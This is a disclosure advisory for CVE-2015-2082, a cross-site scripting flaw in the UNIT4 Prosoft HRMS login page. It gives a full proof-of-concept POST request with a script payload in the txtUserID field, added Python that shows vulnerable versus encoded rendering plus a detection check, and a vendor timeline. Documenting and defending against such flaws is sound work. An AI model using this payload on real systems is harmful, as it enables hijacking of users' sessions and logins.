CVE-2015-2082 – UNIT4 Prosoft HRMS XSS Vulnerability

# Vulnerability type: Cross-site Scripting
# Vendor: http://www.unit4.com/
# Product: UNIT4 Prosoft HRMS
# Product site: http://www.unit4apac.com/products/prosofthrms
# Affected version: <= 8.14.230.47
# CVE-ID: CVE-2015-2082
# Credit: Jerold Hoong & Edric Teo
# PROOF OF CONCEPT
The login page of UNIT4's Prosoft HRMS is vulnerable to cross-site scripting: the value submitted in the txtUserID field of the login form is echoed back into the page without output encoding, as the request below demonstrates.

POST /Login.aspx?ReturnUrl=%2fCommon%2fBroadcastMessageDisplay.aspx%3fUrlReferrerCode%3d&UrlReferrerCode HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cookie: ASP.NET_SessionId=teuq5d45e53ecg45mzptyv55
Host: 127.0.0.1
Content-Length: 1276
Connection: Keep-Alive
Cache-Control: no-cache
Accept-Language: en-SG
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMjAyNzEwNDEyO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%2FZGQCFw8PFgYfAAUHU2lnbiBJbh4EXyFTQgKAAh4FV2lkdGgbAAAAAADAUkABAAAAZGQCCw9kFgJmD2QWBAIDDxYCHwAFQkNvcHlyaWdodCDCqSAyMDExIFVOSVQ0IEFzaWEgUGFjaWZpYyBQdGUgTHRkLiBBbGwgUmlnaHRzIFJlc2VydmVkLmQCBQ8WAh8ABRNWZXJzaW9uIDguMTQuMzMwLjQzZGSwnj3yxmGDZ9jR0wKr5HZldmVj4w%3D%3D&__EVENTVALIDATION=%2FwEWBQLctJOuBALT8dy8BQK1qbSRCwLWxaLXDALD94uUBwZOBjPAY1F7DZ4L5a8tZ4BpX9CW&txtUserID=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&txtPassword=&btnSignIn=Sign+In
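To make the defect concrete for defenders, here is an added example (not code from the advisory or from UNIT4): it decodes the PoC's form body, shows why writing the decoded txtUserID value straight into an HTML attribute lets the payload break out of the attribute, and shows the same template with attribute encoding applied. The two render functions are hypothetical stand-ins for the affected page, the request body is a constructed copy of the PoC with the long __VIEWSTATE and __EVENTVALIDATION values replaced by placeholders, and fields_with_markup is a simple request-inspection check for logging or alerting on inputs of this shape.

```python
import html
from urllib.parse import parse_qs

# Constructed request body: the advisory's PoC parameters with the long
# __VIEWSTATE / __EVENTVALIDATION values shortened to placeholders.
POC_BODY = (
    "__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=VIEWSTATE_PLACEHOLDER"
    "&__EVENTVALIDATION=EVENTVALIDATION_PLACEHOLDER"
    "&txtUserID=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E"
    "&txtPassword=&btnSignIn=Sign+In"
)


def form_fields(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into {name: value}."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def render_login_vulnerable(user_id: str) -> str:
    """Flawed pattern (hypothetical stand-in for the affected page): the
    submitted user ID is written straight into the value attribute."""
    return f'<input type="text" name="txtUserID" value="{user_id}" />'


def render_login_fixed(user_id: str) -> str:
    """Same template with attribute encoding; quote=True also encodes the
    double quote the PoC relies on to close the attribute early."""
    encoded = html.escape(user_id, quote=True)
    return f'<input type="text" name="txtUserID" value="{encoded}" />'


def introduces_script(markup: str) -> bool:
    """True if rendering produced a <script> start tag the template never had."""
    return "<script" in markup.lower()


MARKUP_CHARS = set('<>"\'')


def fields_with_markup(body: str) -> list:
    """Defensive pre-check: names of text fields whose value carries HTML
    metacharacters, so requests like the PoC can be logged or alerted on."""
    return sorted(
        name
        for name, value in form_fields(body).items()
        if name.startswith("txt") and MARKUP_CHARS & set(value)
    )


if __name__ == "__main__":
    uid = form_fields(POC_BODY)["txtUserID"]
    print("decoded txtUserID:", uid)
    print("vulnerable:", render_login_vulnerable(uid))
    print("fixed:     ", render_login_fixed(uid))
    print("flagged fields:", fields_with_markup(POC_BODY))
```

In ASP.NET Web Forms the equivalent of html.escape for this case is HttpUtility.HtmlAttributeEncode (or HttpUtility.HtmlEncode for element content); the fix belongs at the point where the value is written into the page, not in the input-inspection check, which only provides visibility.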

# TIMELINE
- 28/10/2014: Vulnerability found
- 04/11/2014: Vendor informed
- 04/11/2014: Vendor responded
- 30/11/2014: Vendor fixed the issue
- 14/02/2015: Public disclosure
